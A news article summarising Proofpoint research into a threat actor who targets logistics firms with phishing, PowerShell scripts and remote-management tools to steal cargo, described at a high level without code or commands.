Prolific Threat Actor Focused on Using Malware to Facilitate Cargo Theft
In a landscape increasingly threatened by cybercriminal activities, a notable threat actor has emerged, posing significant challenges for the logistics and transportation sectors. Rather than employing traditional hijacking methods, such as armed robbery, these criminals have shifted their tactics to more sophisticated cyberattacks targeting transport and logistics firms. Cybersecurity experts from Proofpoint have reported that a prominent threat actor in this space is using malware to facilitate cargo theft, employing increasingly complex and stealthy techniques.
Research conducted by Proofpoint, published recently, outlines how this malicious actor has adeptly developed new methods to insert remote management and monitoring (RMM) tools into victim systems. The goal behind these intrusions is clear: to gain unauthorized control over logistics operations, divert freight, and steal cargo. This practice often results in cargo being resold online or smuggled overseas, potentially with the involvement of organized crime groups.
The team’s breakthrough came when they analyzed a malware sample using a nuanced deception platform created with Deception Pro software. This approach crafted a convincing yet synthetic environment that mimicked real systems, tricking the threat actor into engaging with it. Such a setup allowed the researchers to track the intruder’s activities over an extended period—more than a month—which revealed a variety of new strategies being employed to exploit compromised environments.
Notably, the threat actor appeared to be a small group of individuals capable of deploying 13 different PowerShell scripts. These scripts were designed for multiple malicious purposes, including enumeration of local accounts, extraction of browsing history, and the collection of valuable data, all sent to bots controlled by the attackers on Telegram. The scope of this operation was vast, targeting credentials associated with various financial services including banking, payments, logistics, and fleet management, significantly heightening the risks tied to cargo theft and fraud.
Focused on controlling as many remote administration capabilities as possible, the attacker installed several types of RMM software on the decoy system. These included SimpleHelp RMM, Pulseway RMM, and multiple instances of Connectwise ScreenConnect. This approach illustrates the actor’s intention to maintain redundant and reliable access to compromised systems, expressing a clear alignment with financially motivated theft and fraud operations.
Intriguingly, the initial focus of the attacker while interacting with the decoy environment was not logistics-related. Instead, they prioritized searching for PayPal usage, bank account information, cryptocurrency wallets, and other forms of valuable data. Ole Villadsen, a staff threat researcher at Proofpoint, highlighted this tendency, indicating that the actor’s expertise extends beyond just transportation to a broader landscape of potential monetization from any affected systems.
The campaign orchestrated by this actor began on February 27, 2026, with a phishing attempt that included a malicious Visual Basic Script attachment. If executed, this script was designed to download and execute a secondary PowerShell payload while displaying a decoy broker-carrier agreement to mislead the victim into thinking everything was normal.
The secondary script was particularly sophisticated, constructing a download URL for a ScreenConnect installer. This installer was associated with attacker-controlled infrastructure and was submitted to a third-party service for code signing. This service, previously unforeseen by researchers, allowed attackers to re-sign the ScreenConnect installers and components using a fraudulent, yet valid, code-signing certificate. The identity of those providing this signing service remains unclear but is suspected to be disseminated within specific cybercrime circles.
Standard operating systems are typically programmed to flag software signed with invalid digital certificates; however, because these installations were executed via scripts rather than direct user interactions, they often went undetected. As a consequence, fewer alerts were raised, allowing the intrusion to occur without triggering common security warnings.
This focus on malware like ScreenConnect has been troubling, particularly given its popularity among attackers. As noted by Villadsen, this software tool has dominated the landscape, becoming a favored asset for cybercriminals looking to execute individual attacks efficiently. Issues related to certificate trust prompted a revocation of one of ScreenConnect’s signing certificates last June, which led the company to redesign its architecture comprehensively to mitigate future abuse.
Despite these advances in defending against direct installations of ScreenConnect, the emergence of signing-as-a-service allows attackers to circumvent controls, demonstrating their resilience and innovation in adapting to security measures. Villadsen pointed out the consistent frequency of operations by this particular threat actor, noting the urgency with which they operate compared to others that might have a more sporadic activity cycle.
Multiple threat actors continue to target logistics firms across North America and Europe, contributing to estimated global losses of $35 billion annually due to cargo theft. Other notable research has surfaced, revealing phishing platforms specifically developed for this sector, with one case resulting in over 1,600 stolen credentials. Villadsen confirmed that the closely monitored threat actor does not appear to overlap with these other phishing campaigns, highlighting the complex nature of the cyber threat landscape in the logistics industry.
In summary, the actions of this threat actor underscore the urgency of reinforcing cybersecurity measures within the transportation and logistics sectors. As attackers grow more adept at exploiting vulnerabilities, the need for heightened awareness and robust defense strategies becomes ever more critical.